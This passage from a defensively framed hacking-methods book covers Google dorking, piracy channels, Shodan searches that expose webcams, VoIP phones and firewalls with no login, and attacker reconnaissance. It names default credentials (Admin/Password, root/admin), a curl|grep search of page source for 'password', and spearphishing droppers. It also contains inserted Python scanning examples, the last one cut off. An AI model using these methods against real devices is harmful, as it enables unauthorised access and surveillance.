Of course, you can also use this technique to verify that your company’s software or information is not indexed within Google. Security professionals can use these techniques to find out if some type of data leakage has occurred from their organization. By being aware of how hackers use Google, you can better protect your organization. Other interesting things can be found within the Google hacking database, which is maintained by Johnny Long at the website http://www.hackersforcharity.org/ghdb/. Johnny has authored several top selling books and has used his notoriety to help promote his charity, Hackers for Charity.

To use the Google hacking database, 


1. Open your browser and go to http://www.hackersforcharity.org/ghdb/.
2. Click on any of the white hyperlinks in the list, for example Files Containing Passwords.
3. Examine the titles within the particular subcategory, then click the blue and white “i” button in the right hand column.
4. Clicking the white hyperlink will take you into Google with that search.
5. You may have to scroll through several pages of search results in order to find some decent results.




You can use the Google hacking database search terms in conjunction with the site: parameter 
and list the website of your company. This can assist you in checking for data leakage. 


YouTube 


YouTube is now owned by Google and has more videos than any person could watch in a lifetime. If you need directions on how to hack something, youtube.com has many videos that will give you a step-by-step tutorial. There are so many specializations within computers, such as forensics, databases, programming, and networking, that no one person can know everything. It is a great skill to have if you can write your own scripts or compile your own “hacking binaries.” However, if someone already created a tool or figured out a way to hack a system, using their tools or methods may save you valuable time. The saying goes, “Why reinvent the wheel?”




And, YouTube is not the only website that has videos. There are lots of other sites out there, such as Vimeo.com, which aggregate a large number of videos that can be useful for you when you are trying to solve the hacking puzzle. If you find a way to hack into something, consider creating a video and uploading it. This way the community can learn and grow from your insight.

Sometimes you do not have to search for anything. It is already there for the taking. Or, better yet, there is already a Firefox application there to assist you in your process. A perfect example of this is the Video Download Helper. This add-on will allow you to download the flash video (FLV) files that are stored on YouTube, so you can watch the videos offline. If you use this tool, be sure not to violate the terms of service of YouTube.

To install Video Download Helper, perform the following steps:


1. Install the latest version of Firefox.
2. Open your Firefox browser, and type http://www.google.com in the address bar.
3. Search for add-ons.
4. Click on the link for Firefox add-ons (should be the first hit).
5. Search for Video Download Helper within all add-ons.
6. Click the Download Now button.
7. Click Install Now and restart Firefox.


Once you have the Video Download Helper add-on installed, open Firefox and go to the website 
youtube.com. Click on the video of your choice and play it. Once the video starts to play, the 
Video Download Helper icon (located directly to the right of the home picture) will become ani- 
mated. Click on the arrow to the right of the Download Helper icon and click Save. 




Most of the files you download will be in FLV format. However, sometimes you will have the 
option to download the video as an MP4. Once you have the file, there are several free programs 
you can use to convert the file to any format you want, including an MP3: 


■ FLV to Video Convertor Pro 2 by Moyea, available from flvsoft.com/flv_to_mp3.
■ Free M4a to MP3 Converter by ManiacTools, available at maniactools.com/soft/m4a-to-mp3-converter.


To convert an FLV file to an MP3,

1. Download FLV to Video Convertor Pro 2 by Moyea from flvsoft.com/flv_to_mp3.
2. Install the program.
3. Open the program.
4. Browse to the location of the FLV file.
5. Select the Output folder.
6. Click the Play button in the lower right-hand corner.


News Servers 


Hackers also use tools such as news servers to obtain software packages, books on PDF, movies, and MP3s. News servers were not designed for the purpose of hosting illegal software; however, some people have decided to use news servers as a venue for distributing illegal software. Pay services such as giganews.com give users the ability to store and download large amounts of files. For about $30 a month, users can download an unlimited amount of files using 256 bit secure sockets layer (SSL) encryption. Users who are using the diamond service are most likely downloading more than 50 GB of files per month. The SSL and VyprVPN service allow users to encrypt their connections, and that makes tracing what they’re doing more difficult for law enforcement. In order to use the Giganews service, you must install their software. They even offer tech support, and a free trial for users who want to test their product. Of course, Giganews does not encourage users to post or download illegal material.

Finding It All on the Net ■ 167


BitTorrent 


BitTorrent is another tool that hackers use to find and distribute illegal software. BitTorrent can be used by companies for the purpose of conducting legitimate business. A large number of VMware appliances can be downloaded via BitTorrent. Internet service providers (ISPs) may block BitTorrent traffic because of the large amount of illegal software that is distributed through its use. The ISPs are also concerned because BitTorrent users are responsible for consuming a large percentage of the company’s bandwidth. The large amount of bandwidth consumed by BitTorrent users results in “legitimate users” having slower Internet connections.

Vuze, formerly Azureus, is a free Java BitTorrent client that allows users to connect to a very 
large network of users sharing files. The files are not located on one central server; users actually 
get small parts of the whole files from users throughout the BitTorrent networks. It is difficult to 
trace where the files have come from because they are distributed from computers throughout the 
world. This is why BitTorrent is a popular choice among hackers. 

There are websites, such as http://www.thepiratebay.org, that have torrent files. This site has 
torrent files for music, movies, and software. Hackers download the torrent files and then use a 
program like Vuze to retrieve the software packages, books on PDF, movies, and MP3s. Sites that 
host torrent files, such as thepiratebay.org, do not have any of the music, movies, or illegal software 
on their servers. Sites like these merely provide torrent files that will allow users with a BitTorrent 
client, like Vuze, to download small parts of the files from other BitTorrent clients. 




Other Options 


Many users get a lot of their information about hacking from various forums. There are often areas where newbies (noobs) can post questions to users with more advanced skill sets. When you are new to a forum, it is often best just to hang out and read some posts for a couple of days before you post something. Take special note of how posts from individuals new to the forum are either accepted, rejected, or ridiculed. Be sure to do some research before making a post, as members tend to become annoyed by people who post questions that have already been asked multiple times. Another good piece of advice about forums is to try to give back and post answers to questions you know (like content covered in this book) or send private messages to some of the more knowledgeable posters. Try to gain their trust and get the answers you need from them. And, although I hate to ever do this, you might have to spend a little bit of money by giving a donation in order to get the information you need when you are first starting out.




Many people who are planning on a career in information technology (IT) look into pursuing various IT certifications. A great place to start is in an IT certification forum like sadikhov.com. Forums like Sadikhov can give individuals ideas about what materials to study to pass their certifications, and helpful hints about exams, like the number of questions, that will assist with preparation. Go into these forums and read the posts related to the certification you are interested in pursuing. Sign up and ask other users what materials they used to prepare for their exam. The best way to achieve success is to ask those who have already passed the exams and model the behaviors that made them a success in their endeavor.

Some sites require logins, which you can simply obtain by registering and then clicking on a confirmation link in your email. Sometimes there may be a situation where sites won’t let you register or you do not feel like giving away your email address. There are sites like www.login2.me which have generic user names and passwords. I would NEVER use this type of site. You can go to this site and type the website you need a login for, and it will provide you with a username and password if it has one for that site in its database.


Firefox has an add-on called BugMeNot that also provides a username and password for you when you go to a website that requires any type of registration. I would caution against using a site like login2.me or a tool like BugMeNot for many reasons. Most sites have terms of service agreements that do not allow multiple people to share accounts. Another concern is that if you use an account like this and share it with another person who is doing something illegal, law enforcement may trace the account usage back to your IP address and come around and start asking questions. It is, however, important to know that sites like this exist out there and that hackers are using them to their advantage. You could take the other road and use a site like this to ensure that account information, such as usernames and passwords, has not leaked to the Internet.




Twitter is a great tool to keep your skills current and follow trends in the field. There are several 
users whose tweets have provided me with valuable information about current trends in hacking. 
Users post 140-character or less tweets about vulnerabilities, exploits, and other important infor- 
mation related to IT. I was skeptical at first also, but it is great. 




Some of the people I follow who post a lot of good information include

mushy99
mubix
carnal0wnage
HDMOORE


There are two methods to contact someone: via a direct message or through a mention. You only 
have the ability to send someone a direct message if they are following you. You can mention anyone 
by clicking on a person’s name; then the @ symbol will appear in front of their name in your tweet. 

One thing you need to be careful about when using Twitter is the shortened links that users often tweet when they are trying to refer you to a website. Websites like www.bit.ly allow users to create shortened links that can easily be posted in 140 characters or less. Be cautious when clicking on these links, as they could take you to websites that have inappropriate or even malicious content. Someone could easily build trust with their Twitter followers by posting hundreds of legitimate links, then post a single bad link.




While forums are a great way to communicate with others on the Web, they do not always have people waiting around in real time. If you do not have time to search through forums or don’t have the patience to wait for people to reply to your posts, you may want to try another method to communicate with other knowledgeable individuals, like Internet Relay Chat (IRC). Average, everyday users tend to shy away from IRC, which makes it a great way to communicate with some more advanced and knowledgeable users.

Various tools can be used to connect to IRC servers including mIRC, Pidgin, Opera, and the 
Firefox add-on Chatzilla. You can learn a lot from hanging out and talking to other people in IRC 
forums. There are IRC rooms you can join for Wiihacks, Metasploit, and BackTrack. One of the 
best tools that any hacker or penetration tester can use is Metasploit, which is covered in Chapter 11. 
By hanging out in the Metasploit room on the irc.freenode.net IRC server, you can learn about 
Metasploit by listening to other users or asking questions. 

To use the Metasploit IRC room, 


1. Install the latest version of Firefox.
2. Open your Firefox browser, and type http://www.google.com in the address bar.
3. Search for add-ons.
4. Click on the link for Firefox add-ons (should be the first hit).
5. Search for Chatzilla within all add-ons.
6. Install the add-on, then restart Firefox.
7. From the tools menu of Firefox, select Chatzilla.
8. In the dialog box, type /server irc.freenode.net.
9. In the dialog box, type /join #Metasploit.
10. You should be connected to the Metasploit room on www.irc.freenode.net.


Users who have Linux can use the curl command in conjunction with grep to parse through web pages for specific terms. It can be very helpful if you are searching through a site or forum for a specific term or phrase. Sometimes lazy administrators or coders leave information in the HTML code that will not be revealed to users who do not examine the source code of the page. Curl will grab the source code of the web page, and grep will allow you to search for a specific hidden term like password or username.




To use curl and grep, 
1. Boot to any distribution of Linux. 
2. Type curl http://IPorFQDNofthesite | grep password. 
3. If the word you searched for (password in this example) is listed anywhere within the source code, the matching line will be displayed. 
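The curl | grep check above, carried one step further as an added Python example (not code from the book): besides matching lines on a keyword, it pulls out HTML comments and hidden form fields, the usual places where such leftovers sit. The sample page, site name, and credential values below are constructed for the example.

```python
"""Scan a page's HTML source for credential-like terms a developer left
behind, the check that `curl ... | grep password` performs by hand.

Added example, not code from the book. The page source below is
constructed; the names and values in it are made up."""
import re

# Terms the chapter searches for, plus a few common spellings.
KEYWORDS = ("password", "passwd", "pwd", "username", "login")

# Constructed sample source, standing in for the output of
# `curl http://IPorFQDNofthesite`.
SAMPLE_HTML = """<html>
<head><title>Awesome Web Page</title></head>
<body>
<h1>Super Secure web site</h1>
<!-- TODO remove before launch: admin login is admin / Winter2010 -->
<form action="/login" method="post">
  <input type="hidden" name="debug_password" value="letmein">
  <input type="text" name="user">
  <input type="submit" value="Go">
</form>
<p>Best Web Site Ever</p>
</body>
</html>"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
HIDDEN_RE = re.compile(r'<input[^>]*type=["\']hidden["\'][^>]*>', re.IGNORECASE)


def grep_lines(html, keywords=KEYWORDS):
    """Equivalent of `grep -in` over the source: (line number, line) pairs
    whose text contains any keyword, case-insensitively."""
    hits = []
    for number, line in enumerate(html.splitlines(), start=1):
        lowered = line.lower()
        if any(word in lowered for word in keywords):
            hits.append((number, line.strip()))
    return hits


def find_comments(html, keywords=KEYWORDS):
    """HTML comments mentioning a keyword. Comments are never rendered,
    so a visitor who does not view the source never sees them."""
    found = []
    for match in COMMENT_RE.finditer(html):
        text = " ".join(match.group(1).split())
        if any(word in text.lower() for word in keywords):
            found.append(text)
    return found


def find_hidden_fields(html, keywords=KEYWORDS):
    """Hidden <input> fields whose name mentions a keyword, with their value."""
    found = []
    for match in HIDDEN_RE.finditer(html):
        tag = match.group(0)
        name = re.search(r'name=["\']([^"\']*)["\']', tag)
        value = re.search(r'value=["\']([^"\']*)["\']', tag)
        name_text = name.group(1) if name else ""
        if any(word in name_text.lower() for word in keywords):
            found.append((name_text, value.group(1) if value else ""))
    return found


def scan(html, keywords=KEYWORDS):
    """Run all three checks and return them in one report dict."""
    return {
        "lines": grep_lines(html, keywords),
        "comments": find_comments(html, keywords),
        "hidden_fields": find_hidden_fields(html, keywords),
    }


if __name__ == "__main__":
    report = scan(SAMPLE_HTML)
    for number, line in report["lines"]:
        print(f"line {number}: {line}")
    for comment in report["comments"]:
        print(f"comment: {comment}")
    for name, value in report["hidden_fields"]:
        print(f"hidden field {name} = {value}")
```

Run it against your own site's source before launch; anything it reports is visible to every visitor who views the page source.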




ShodanHQ.com 


Unlike Google, which indexes web content, ShodanHQ is a search engine for computers and devices. By examining the response of the devices 
it contacts on the Internet, a user is able to gain information about the site, such as 

■ The target OS 
■ The version of web server software 
  — Apache 
  — Internet Information Services 
■ If default passwords and usernames are being used 
■ Identify webcam devices 
■ Identify network printers 
■ Identify firewalls 
■ Identify voice-over-Internet protocol (VoIP) devices 
The shodanhq.com website will allow you to search for computers running specific versions of 
software or with specific ports open. It is also possible to search for certain hostnames or within a 
specific country. To use the country search filter, you are required to log in (free account). I recom- 
mend that you create an account in order to make the most effective use of the site. Some of the 
search filters include 

■ Port 
■ Operating system 
■ Server software 
■ IP address ranges 

When you go to the site, click the arrow below the word register to filter by the following services: 

■ Hypertext transfer protocol (HTTP) 
■ File transfer protocol (FTP) 
■ Secure shell 
■ Simple network management protocol 


[Screenshot: Shodan's Filter by Country and Filter by Service panels, the latter listing services such as ssh (22).]


If you are not sure what to search for, you can always go to www.shodanhq.com/browse to see 
some of the most popular searches. As you will see, some of them are very intriguing. 


[Screenshot: the Shodan Browse All Searches page. Popular Searches listed include "default password", "router default password", "cisco-ios last-modified", "Webcam", "netgear", "dreambox", "Router w/ Default Info", "IOS HACK - old", "Snom VOIP phones with no authentication", "webcam VIDEO WEB SERVER", and "FTP anon successful".]
Some of the interesting results include 

■ Default passwords 
■ Webcams 
■ Routers with default info 
■ Snom VOIP phones with no authentication 
■ Netgear routers with user Admin and password of Password 
■ FTP sites allowing anonymous access 


Now, if you choose to click on any of these websites and go as far as logging in to these systems 
with the default username of Admin and password of Password, I would go as far as to say that you 
are committing a crime. Even though the device has not been properly secured, there is very little 
chance that the operator of the device wanted you to access it. However, if you click on the link 
and no authentication is required whatsoever, you can probably view the page. 


[Screenshot: two Shodan results for snom phones, each showing the device's HTTP banner:]

HTTP/1.0 200 Ok 
Server: snom embedded 
Content-Type: text/html 
Cache-Control: no-cache 
Cache-Control: no-store 
Content-Length: 9366 

HTTP/1.0 200 Ok 
Server: snom embedded 
Content-Type: text/html 
Cache-Control: no-cache 
Cache-Control: no-store 
Content-Length: 8427 


For example, if you click a link to a VOIP phone with no authentication, you are sent directly 
to the phone page. No authentication is required whatsoever. From this interface, the user can 
make calls and delete and edit dialed numbers. 


[Screenshot: the web interface of a snom 300 phone (version 7) opened in Internet Explorer with no authentication. The Home page offers a "Dial a Number" field with Dial and Hangup buttons and an Outgoing Identity selector; the left menu includes Setup, Function Keys, Identity 1-4, Action URL Settings, Advanced, Trusted Certificates, Software Update, Status, Log, SIP Trace, DNS Cache, Subscriptions, PCAP Trace, Settings, and Manual. The Dialed Numbers list shows date, time, duration, local identity, and number for calls placed on 10/27/2010, each with a delete control.]


Getting into someone’s phone without any authentication is bad. Being able to view their 
webcam might even be worse. There are several versions of webcams listed in Popular Searches. 
[Screenshot: further Popular Searches entries: Synology Disk Station (http://www.synology.com/us); DD-WRT, described as Atheros and Broadcom chipset routers (Linksys, Fonera and others) with default credentials root/admin; and DCS-5220, D-Link web cameras.]


When you click on the link, you are presented with a list of IP addresses and their banner 
messages. Some of the links will ask for a username and password and others will not. In order to 
properly view the webcams, you may be required to install a plug-in for Internet Explorer. Notice 
that the ability exists to move, maintain, and change the setup of the webcam. 


[Screenshot: a DCS-5220 IP camera's page in Internet Explorer. The page reads "This section shows your camera's live video. You can control your settings using the buttons below. Current resolution is 640x480." above the LIVE VIDEO frame.]


In many cases, people do realize that they are being watched on camera in a store. They prob- 
ably do not realize that anyone on the Internet can watch them make their purchase. In this case, 
I wish this guy would buy something already. And people call me indecisive. 


I do understand the need to protect a company's finances by watching the transactions at the 
register. But, the whole Internet should not be watching. Bad people might do bad things. 


It would be a good idea if people protecting their networks enabled a firewall. That will make 
their network more secure from attackers. However, a firewall without a required username or 
password will not be very effective as anyone who locates the site will be able to make changes. 


[Screenshot: the Shodan "Firewalls" search entry, describing a number of WatchGuard firewalls that allow connection to the web administration page without credentials; where passwords are implemented, they can still be viewed in the page source.]


In this case, users will have unrestricted access to the firewall control panel because the admini- 
strator forgot to require authentication; anyone from the Internet can now configure it. 


[Screenshot: "WatchGuard Configuration Settings" for a SOHO 6 in Internet Explorer, reached with no authentication. The left menu covers Network (External, Trusted, Optional, Routes, Dual ISP, Network Statistics, DynamicDNS), Administration (System Security, VPN Manager Access, Update, Upgrade, View Configuration File), Firewall (Incoming, Outgoing, Custom Service, Blocked Sites, Firewall Options, Pass Through), Logging (WSEP Logging, Syslog Logging, System Time), WebBlocker, and VPN. The System Status page welcomes the user to the SOHO configuration site and shows Firewall 6.3 (Sep 25 2003 build 19), Boot ROM 5.5, platform WatchGuard SoHo6, 25 user licenses, WSEP Logging and VPN Manager Access disabled, optional features not installed, and the trusted network 192.168.111.1 / 255.255.255.0 with the DHCP server disabled.]
Printing is important to every organization and company. It is probably not a good idea to 
leave your device wide open so anyone from the Internet can connect to configure your device. 


[Screenshot: the Popular Searches entry "JetDirect HP Printer", dated 11 Jan 10, described as JetDirect HP Printer running FTP.]


For the printer results, the IP addresses are not shown as links; the URL has to be typed into the browser manually. 


[Screenshot: two result entries whose Details banners read "HP ETHERNET MULTI-ENVIRONMENT,ROM P.22.01,JETDIRECT,J096,EEPROM P.24.67,CIDATE 12/13/2002" and a similar banner for a second JetDirect card with ROM none and a J0128 model number.]


Once connected, the user can configure the printer. Looks like this guy needs a new toner 
cartridge. 


[Screenshot: the embedded web server of an HP LaserJet 4200 in Internet Explorer, Device Status page. It reports "ORDER CARTRIDGE LESS THAN 1400 PAGES", Black Print Cartridge 10% (HP Part Number Q1338A) and Maintenance Kit 72% remaining, Pause/Resume and Continue buttons, the media trays (Tray 1 any size/any type, Tray 2 A5 plain), a Change Settings link, the printer serial number, firmware datecode 20030530 04.016.1, Mopier ON, tray capacities (Tray 2: 500 sheets, Tray 1: 100 sheets), an 11 MB RAM disk, and the DIMM slot contents (8 MB Flash, 64 MB SDRAM).]


Other devices with weak implementations of security listed on the Shodan HQ website include 

■ Television panels 
■ Solar panels 
■ Network attached storage 
■ Routers 
■ Server controls 
The website works well because people fail to implement security properly. It is always a good idea 
to change the default username and password of a new device. Also, if possible, adjust the device so 
the security settings are configurable only from the LAN, not the Internet. Always set a password. 


[Screenshot: a VIVOTEK camera's web page in Internet Explorer, titled "DO NOT SET PASSWORD !!!".]


In summary, everything is already there on the Internet; you just need to have the skills and 
techniques to be able to find it. One of the techniques that can be utilized to find virtually any- 
thing is by typing what you want to find followed by “rapidshare.com.” Another strategy is to 
find someone who has or knows how to do something, and ask them for assistance. Experts can 
be located in IRC chat rooms, on Twitter, or in forums. Never download any copyrighted mate- 
rial because doing so is both illegal and unethical. Knowing how the hackers do what they do is 
important because you can use the same techniques to make sure that your organization does not 
have any type of information leakage. 


Chapter 7 


Research Time 


Overview 


In this chapter we go over ways that hackers go about researching the targets they wish to attack. 
Smart hackers likely won’t go in with guns blazing trying to hack any system or network available 
to them. They have very specific motivations for what they are targeting and reasons for what they 
want to attack. Hackers are targeting something specific, and need to find many different avenues 
and routes to get to that specific target in order to attack. 

For instance, many times the hacker is looking for a specific piece of information, and that is 
the reason for the attack. That’s one of the reasons we have “information assurance” and “information 
security”: the hacker targets the technical systems that handle the information. Therefore, when 
he is planning an attack, he is going to target the systems, devices, processes, users, and everything 
else that touches that specific piece of information. In order to know what to target and how to 
break into these systems, hackers have to perform tremendous amounts of research. The true threat 
of a hacker is measured by his ability to perform research on his target. 

As a hacker it’s impossible to know everything: all programming languages, tools, operating 
systems (OSs), exploits, vulnerabilities, and so on. Therefore, he has to research based upon his 
targets. Remember, the more advanced hackers are aware of the consequences of getting caught, 
so they know the importance of gathering as much information about the target as possible 
for planning and assessing the best method of attack. This is where information security comes in; 
information security is essentially the protection of information. The hacker is seeking as much 
information about his potential targets as possible, while the information security professional’s 
job is to minimize how much information about his information assets is exposed. If the 
hacker doesn’t know what to attack, how can he wage his cyber war? This is something to think 
about. The art of deception works both ways: if security professionals have full control over how 
their organization deflects attack research and planning, this is going to confuse and deter many 
hackers. However, it may also give the hacker steadfast motivation to do anything possible 
to infiltrate the network, especially since the weakest element is the “human element,” which is 
highly susceptible to social engineering attacks. 
The point is the more information the attacker has about his target the better he is able to 
develop a well-thought-out plan for his attack. Therefore, as a defender of the network your job is to 
limit the amount of information an attacker can leverage against you. Much of the attack informa- 
tion the hacker is trying to grab is found on the Internet using publicly available research techniques. 


Research, Time, and Planning 


It's important to know that all of the hacker's research goes into planning his attack; good hackers have 
all the time in the world to complete their objective, because they know they only have one shot to do 
it, so they have to do it right. Doing it right likely requires taking some steps to avoid 
detection. Patience is a virtue. However, for every patient hacker, there should be a patient investigator. 

To do it "right" depends on the type of hacker that is trying to penetrate the system or net- 
work. We aren't talking about script kiddies. The more advanced hackers have the skills and knowl- 
edge to understand the importance of being patient and precise in their attacks. If it takes 
weeks, months, or years to gather the correct information to craft their attack, they understand 
that that is what needs to be done. This is where time for research comes in; hackers need to gather 
as much information as possible to plan their attack while minimizing the risk of getting caught 
and eliminating the digital footprint they leave behind, whether they are researching or attacking 
a target. So if hackers are going to research and gather intelligence on a target, the smart ones 
are going to try to mask the source of their research. 

Sun Tzu's Art of War is an admired war book written around 500 BC about warfare and strat- 
egy. Many of the lessons contained within can be applied to cyber warfare. The very first chapter 
of that book is "Laying Plans." The hacker's research is laying plans for assessing different points 
that will most likely achieve victory. 


Earth comprises distances, great and small; danger and security; open ground and 
narrow passes; the chances of life and death. 

Sun Tzu 
Sun Tzu's Art of War, translated by Lionel Giles, http://classics.mit.edu/Tzu/artwar.txt 


The attacker can be slow and precise, hide his identity, or completely beat down the front door of 
the network. Whatever the strategy may be, the hacker's research is the life or death of his attack; 
his research is what gives his techniques life. The hacker can beat the front door down with hundreds of 
exploits or could craft a strategic Google query on an organization that gives him the root password 
to a server. Which is easier? Which leaves more evidence? Just remember the elite hacker is going to 
take his time to research all available vectors to his target, be extremely stealthy about it, and gather 
as much information as possible to develop a plan that leads to the successful victory of his mission. 


All Vectors Possible 


For example, in the last months, years, or probably days you've heard about certain defense con- 
tractors losing intellectual property due to compromised systems and networks. In this scenario, 
the hacker may have somehow brainstormed all the targets that might have had access to the 
information he was looking for such as “top secret plans.” Let's assume for example it's stored on 
a secured server. The attacker is going to brainstorm and think of every possible avenue of attack 
and do as much research as he can to find all vectors to locate where this information is stored on 
the network. 

In information security, data and information are secured by the information systems that the 
data travels through, such as the email system or the network backbone. 
The hacker is going to expand on those principles and think of all variables of the information he 
wants to steal or servers he wants hacked. There could be users, computers, networks, and hundreds 
of pieces of information to research that are all avenues of attack. As with information security and 
securing the enterprise, the hacker may take a bottom-up approach to find vectors. The asset 
that the hacker is targeting is only as secure as the weakest link in that information system. The 
hacker could target the users that access this information. He would want to know if this informa- 
tion is accessed internally or even externally through the Internet. Hackers just want to know which 
attack vectors have a route to their mission and are likely to look for the easiest option. 


Internal or External Intelligence 


Generally, when hackers begin their research, most of it will be external information, that is, 
information gathered from outside the organization. Odds are that the hacker doesn’t have internal access to your net- 
work (otherwise he would probably already be in). So the only information the hacker can start 
out with is what is available to him externally: what can be found from outside 
the external network, used to gather intelligence on the perimeter of the network and on internal 
sources. Externally we may be looking at web servers, routers, firewalls, and everything we can 
find about the Web presence of our target, or even specific users themselves. 

An example of such an attack is the spearfish, as described in social engineering. This is a type of attack 
where a hacker sends a targeted email to a specific user in order to coerce him into compromising 
his user account, password, computer, and so on. This is a common trend among initial compro- 
mises by adversaries. Typically, the hacker might send a malicious Adobe PDF attachment that, 
when opened, acts as a dropper to execute malware that allows the attacker to take over the target 
computer. Well, the hacker didn't just send this at random, as with a mass phishing email; he had 
a reason or motivation behind it. This is where external research comes in. He did his research and 
planned a strategic attack using external intelligence he gathered. 

For instance, say the hacker needed access to a server that was hosting a “why ninjas are so awe- 
some” website. The hacker, hoping to deface the site and replace it with a “pirates are way better” 
site, would send a spearfish email to find out information on the root administrator of the server 
and maybe his email address. Once he obtained his email address he could then send his malicious 
code to his target or a contact of the target from which he could stage the attack, using some type 
of information he gathered that he almost positively knows the target will open. This could be an 
email from another known colleague, superior, or client contact. Once the attacker is in, he would 
then perform additional internal research on the targets. 


Direct Contact versus Indirect Contact 


Research can be conducted directly or indirectly, trying to gather as much intelligence as pos- 
sible and learn everything the hacker can about his target. The attacker is going to be as strategic as 
possible about it. In order to gather intelligence about his target he is initially going to probe and 
collect data about the structure of the network and target without ever scanning the network or 
target directly. This is the difference between direct and indirect contact. 

Figure 7.1 Level of contact and happy hacker. 

Direct means the attacker is directly accessing the target or organization in some fashion where 
there might be some type of forensic artifact traced back to the attacker. Indirect means he's using 
some type of third party or proxy to access information and gather intelligence about the target. 
This essentially means it’s hard to trace the activity back to him. Normally, the attacker is going to 
exhaust all indirect means first when gathering his intelligence, as that minimizes the 
threat of him getting caught or his presence being known. If the intelligence he gathers isn’t 
enough to proceed with the plan, then the attacker will have to pursue more direct means. The more 
direct the actions taken against the system, the more artifacts they leave behind (see Figure 7.1). 

This chapter is going to focus on indirect research means, because most direct contact has to 
do with the vulnerability and exploit research covered in later chapters. Therefore, we are going 
to research the organization itself, its individuals, or its technical implementations for avenues of 
attack using mostly indirect means. 


Learning the Topology 


In this stage, learning the topology is important because the attacker is going to determine as best 
he can how the network is made up in order to plan out his attack. He'll be trying to identify the topo- 
logy of the network and determine which hosts are the weakest link to the outside. The attacker 
should also be identifying the third parties involved in the target network, as in a typical 
enterprise methodology where third-party sites are trusted back into the corporate network. For 
instance, if there are third-party sites that are just as trusted on the enterprise backbone, those 
might be valid avenues of attack. A target corporation may have subsidiary compa- 
nies that connect into the same backbone but have less stringent information security policies and 
procedures, or third parties that may have none at all (support, vendors, clients). 

In Figure 7.2, you can see that Pwn3d Corporation is designed in an extended star topology, where 
the majority of external sites have wide area network (WAN) links into the corporate headquar- 
ters. This is common in the enterprise methodology; the interesting part is that in this 
scenario many remote clients and other company sites use the backbone for server services, so if 
for any reason their link goes down they can no longer access, say, the central email server. Notice that 
the area between the Internet and the firewall is a lot less trusted. Typically, at WAN/LAN (local 
area network) intersections you will find firewalls and intrusion detection systems, and this part 
of the segment is constantly being monitored. Once the hacker penetrates the internal network, 
his activities might be monitored less because he has entered a more trusted area. Therefore, this is 
a prime area for the hacker to infiltrate, as the defenders are waiting for him to come through the front door 
instead of through the sliding glass door in the back. 

Figure 7.2 Sample enterprise topology. 
Some key points the hacker will be considering are 


■ Network topology arrangement 
  — Third-party access arrangement 
    • Secondary sites 
    • Client sites 
■ Servers/network devices with outside access (web, email, virtual private network [VPN] 
server) 


To defend against third-party avenues, make sure that all third parties have stringent access 
requirements and security restrictions. This can consist of multifactor authentication between cli- 
ent sites, using sophisticated access control lists (ACLs), monitoring the network perimeter with 
intrusion detection systems (IDS) such as Snort, and turning on all possible logging for threat 
analysis. It is important to turn on all logging for devices and perform daily analysis of those logs. 
Many information security professionals choose to enable virtual private network (VPN) connec- 
tions between remote sites and treat them like an Internet link: untrusted in their policies and 
procedures. 


Learning the Structure 


The attacker will be trying to determine the makeup of the topology to identify detailed 
host-related information. He will want to obtain the network blocks of Internet protocol (IP) 
addresses because this will be the known attack range for the target and will identify avenues 
of hosts to target. Also, he will want to know which domain name system (DNS) 
records are associated with which IP addresses and which servers are hosted directly or by a third 
party such as a common hosting provider. The DNS makeup will give us clues about other 
hosts and how the topology is further structured. For instance, given www.dns1.domain.com, 
the hacker might look at dns2, dns3, and so on. The information we gather from the topology 
and the structure will allow us to use more detailed and advanced vulnerability scanning tech- 
niques to gather valuable target host information through more recon vulnerability scanning, 
as will be explained in Chapter 9. 
Some key pieces of information the hacker will be obtaining are 

■ Network blocks of IP addresses 
■ IP addressing structure 
■ IP addresses and DNS records for those servers 
■ DNS makeup 
■ Identifiable contacts 
  — Clients, providers, associated companies 
  — Usernames 
  — Email addresses 


Techniques and Tools 


One of the greatest assets to the hacker's tool chest is the Internet. He has a plethora of tools 
available to perform various research-gathering techniques using indirect and direct methods. In 
this section we will go over some of the best methods hackers use in order to gather research on 
a target. 


Whois 


The command whois stands for “who is,” and its primary use is to query registries for information 
regarding a domain name. This is what is known as a whois lookup, and it can contain a plethora 
of valuable information. Depending on the registry being queried and the database used to 
determine the registrant, hackers and investigators alike can determine who owns a domain name, 
what the IP address block of that domain is, and much more additional information, such as when 
the domain was registered and even the date it expires. Depending on the service doing the query, 
there may be additional information added that can be used to gather information about a target. 

Currently, the Internet Corporation for Assigned Names and Numbers (ICANN) is respon- 
sible for the management of domain names and their IP addresses; prior to 1998 this was done 
by InterNIC. ICANN assigned it to the Internet Assigned Numbers Authority (IANA), oper- 
ated by ICANN, which manages IP address allocation, root zone DNS, and other information. 
The problem is that with so many domain name registrars, domain name proxying, and the complex 
management of domain name registering, sometimes you, the hacker, may need to know what 
the authoritative whois server is for the domain, because the more authoritative one may contain 
additional information to leverage. Some of the most popular whois servers are the ones run 
by the American Registry for Internet Numbers (ARIN), or even registrars themselves such as 
GoDaddy. 


Reserved Addresses 


On a second note, if you think your network is under attack by IANA, it is recommended that 
you view the website http://www.iana.org/abuse/. IANA reserves protocol and number resources 
as well, so you may see IP addresses in your logs along the lines of 10, 127, 169.254, 172.16–172.31, 
192.168, and blackhole-1.iana.org. This isn't an attack by IANA itself; it is IANA’s private IP 
addressing assignments, local loopback addresses, and so on. This will give you a refresher on 
network addressing 101, and prevent you from penetrating 127.0.0.1 as payback. If you use 
a whois service, its database contains IP addresses, autonomous system numbers, organizations or 
customers that are associated with the resources, and their related points of contact. 
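Sorting the reserved ranges listed above out of a log before anyone "attacks IANA", as an added Python example that is not code from the book. The log lines and their src=/dst= layout are constructed; the 192.0.2.0/24 and 198.51.100.0/24 addresses are RFC 5737 documentation ranges standing in for real outside addresses.

```python
"""Sort the source addresses in firewall log lines into the IANA-reserved
ranges the chapter names (10, 127, 169.254, 172.16-172.31, 192.168)
versus genuinely external addresses, so that a private or loopback
address is neither mistaken for an outside attacker nor chased as one.

Added example, not code from the book. Log lines are constructed;
standard library only."""
import ipaddress
import re
from collections import Counter

# The reserved blocks the chapter lists, as networks with a label.
RESERVED_BLOCKS = [
    (ipaddress.ip_network("10.0.0.0/8"), "private (RFC 1918)"),
    (ipaddress.ip_network("172.16.0.0/12"), "private (RFC 1918)"),   # 172.16-172.31
    (ipaddress.ip_network("192.168.0.0/16"), "private (RFC 1918)"),
    (ipaddress.ip_network("127.0.0.0/8"), "loopback"),
    (ipaddress.ip_network("169.254.0.0/16"), "link-local"),
]

# Constructed sample log lines (generic "src=/dst=" layout, not a product's).
SAMPLE_LOG = """\
2010-10-27 14:04:01 DROP src=10.4.2.9 dst=192.0.2.7 proto=tcp dpt=22
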